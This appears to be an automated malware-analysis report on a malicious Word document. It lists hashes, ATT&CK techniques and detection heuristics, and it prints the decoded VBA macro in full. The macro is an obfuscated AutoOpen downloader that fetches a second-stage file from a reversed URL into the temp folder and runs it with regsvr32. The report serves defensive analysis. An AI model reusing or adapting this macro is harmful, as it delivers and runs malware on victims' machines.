Office (OOXML) malware analysis — malicious · f6ccaa8a50fb8167

MALICIOUS

Office (OOXML)

60.3 KB Created: 2020-04-28 09:58:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-07-24

MD5: 9b3410c8b1b4a69677637661ff36c39d SHA-1: 9a1ec2ac434eb8e9d62db4b34cd657f69deaf4a1 SHA-256: f6ccaa8a50fb8167c4702fca64725625102ee0d81f041c8c7119228085f94833

378 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer T1218.011 System Binary Proxy Execution: Rundll32

The sample is a malicious OOXML document containing VBA macros. The AutoOpen macro is designed to execute a payload that uses URLDownloadToFile to download a second-stage artifact from a remote location. The script also utilizes WScript.Shell.Exec, indicating a likely attempt to execute the downloaded payload, possibly via a LOLBin.

Heuristics 9

ClamAV: Doc.Malware.Generic-7898874-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Generic-7898874-0
VBA project inside OOXML medium 6 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD

URLDownloadToFile in VBA

Matched line in script

#If VBA7 And Win64 Then
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" ( _

LOLBin reference in VBA critical OLE_VBA_LOLBIN

LOLBin reference in VBA
Matched line in script
```
' Palestine deferred
Call zD.K("regsvr32 " + gp)
bL = Hex(258)
```
VBA URLDownloadToFile reversed-LOLBin launcher critical OLE_VBA_URLDOWNLOAD_REVERSED_LOLBIN

VBA auto-exec macro downloads a payload with URLDownloadToFile and launches it through WScript.Shell.Exec using a reversed command string. This is a high-confidence downloader/launcher pattern, not an Office parser CVE.
Matched line in script
```
#If VBA7 And Win64 Then
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Enum
Sub AutoOpen()
gu = Abs(46)
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
' Prophet waitress silica voted
kT = Environ(NO)
End Function
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
- http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
- http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by macro
- http://ns.adobe.com/xap/1.0/Referenced by macro
- http://purl.org/dc/elements/1.1/Referenced by macro
- http://ns.adobe.com/xap/1.0/mm/Referenced by macro
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#Referenced by macro
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#Referenced by macro
- http://ns.adobe.com/photoshop/1.0/Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	4889 bytes
SHA-256: `78749797efcae284dedd849684a3b647f6269a9e067758c93abe541db8a3e397`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "q" Function V(Qh) Eh = Abs(-14) ' Leads Dim T7 T7 = DateSerial(2006, 8, 8) ' Newfoundland sanitary wheaten jess earliest yF = Hex(387) E = Abs(2) ' Saucy disagreed birthplace nieces End Function Function G() B = Fix(41) Dim sJ sJ = 4 * Atn(1) ' Most C3 = Fix(-19) l = Fix(23) DV = Fix(-67) uD = Fix(51) ' Oral leaf fees arable Z = Hex(83) ' Woolen coupled ' Campus parish temp trumpery teacup scalp Dim M M = DateSerial(2006, 11, 10) Dim qi, a1 qi = 4 a1 = 4 / Cos(qi) Rw = Abs(-48) ' Attica Dim RC RC = 4 * Atn(1) p7 = Hex(272) ' Convulsive aaron lintel kitchen Dim O0 O0 = DateSerial(2003, 5, 5) ' Quartette sulphurous Dim yk yk = 4 * Atn(1) ' Edgar paired results ' Bringing spot md situations hour SI = Hex(437) FQ = Abs(-80) ' Playwright ridge laziness differ harangue postal P = Fix(14) ' Neptune rapping ' Thyme ut furlong ' Oxfordshire transgressor lloyd fisheries mistress ' Aristocrat ' Sucks TP = Abs(-24) ' Bilateral karaoke negotiation suffer s = Abs(46) ' Drawback fauna bottomless facilitating deposition tit fe = Fix(18) Y0 = Hex(95) ' Spank conciliate It = Fix(66) ' Zest paraffin chattel Dim bZ bZ = DateSerial(2009, 9, 17) WJ = Abs(21) Dim f f = DateSerial(2008, 3, 25) End Function Public Enum j uz = 1 End Enum Sub AutoOpen() gu = Abs(46) Th = Abs(-19) ' Transit come Dim yn, Ne yn = 1 Ne = 1 / Cos(yn) ' So-and-so shopping membrane trust pumps in Dim YH YH = DateSerial(2019, 6, 12) ' Gas frontal bali ethernet rental ' Rosebud extraction fulfill XO = Abs(-25) ' Trackless capitulate hosts harmed plastered Dim N1, D N1 = 1 D = 1 / Cos(N1) ' Cole informal length disposition situation pleasant qS = Abs(-51) ' Bellies webb ' Active robust trend allocation Dim zD As New Os u3 = Hex(215) Dim zK zK = DateSerial(2002, 1, 2) ' Centaur insuperable protecting uncultivated clustered darwin draughts gp = zD.kT("tmp") & "\HV.tmp" vP = Fix(-49) ' Nondescript resonance melissa caused ' Thumbzilla save mp regime ' Fc consumer aides advocacy developers desert ov = Abs(-57) Ua = Abs(-67) zD.y "bac.9kon=l?php.p23i0oia/58ol02ew/moc.8fjjfbb//:ptth", gp cn = Fix(22) ' Storehouse devon parcel eva Dim CG CG = DateSerial(2000, 3, 16) ' Beneficial solvent touchstone character Gv = Hex(439) ' Vicarage holes beings talented Dim t t = DateSerial(2001, 10, 13) ' Alto commitment participation below Dim xb xb = 4 * Atn(1) ' Palestine deferred Call zD.K("regsvr32 " + gp) bL = Hex(258) ' Occasional chauffeur Dim rA, AA rA = 7 AA = 7 / Cos(rA) ' Attention OK = Hex(359) End Sub Attribute VB_Name = "Os" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = False #If VBA7 And Win64 Then Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _ Alias "URLDownloadToFileA" ( _ ByVal pCaller As LongPtr, _ ByVal szURL As String, _ ByVal szFileName As String, _ ByVal dwReserved As LongPtr, _ ByVal lpfnCB As LongPtr _ ) As Long #Else Private Declare Function URLDownloadToFile Lib "urlmon" _ Alias "URLDownloadToFileA" ( _ ByVal pCaller As Long, _ ByVal szURL As String, _ ByVal szFileName As String, _ ByVal dwReserved As Long, _ ByVal lpfnCB As Long _ ) As Long #End If Private Sub Class_Initialize() Dim a a = 4 * Atn(1) Dim sZ sZ = 4 * Atn(1) ' Thinker emma matrix carbonic Dim Qw Qw = DateSerial(2009, 10, 10) ' Dressing illiterate Dim lM lM = DateSerial(2016, 10, 29) ' Clean End Sub Private Sub Class_Terminate() ' Loathe ' Hopefully protectorate statuesque negotiations fish VL = Abs(36) ' Region northamptonshire dump End Sub Public Function y(c5, EE) ux = Abs(-31) ' Simplified rugby miscreant blades sallow mh = Fix(2) Dim My My = DateSerial(2020, 5, 16) ' Agone U = URLDownloadToFile(0&, StrReverse(c5), EE, 0&, 0&) End Function Public Function kT(NO) Dim sC sC = DateSerial(2003, 8, 16) ' Restrict warily clock bugle died ' Dislodge mesh viii ' Squint star hottentot ' Cancel webcam id cherub fx = Hex(465) ' Prophet waitress silica voted kT = Environ(NO) End Function Public Sub K(EE) Dim sf, f6 sf = 3 f6 = 3 / Cos(sf) ' Webcams smooth iraqi saucy manitoba ' Undeserving rake terminology peaked pyrenees ' Brown transitive painstaking flog installed SU = Abs(-54) ' Pam sonic ' Lucknow lengthen Dim iH As New WshShell iH.exec EE End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	27136 bytes
SHA-256: `1152983e3c835bdf150a50ea05e9f144e7bc4403be4f8544daa06ac054e2c79a`
Detection ClamAV: Doc.Malware.Generic-7898874-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.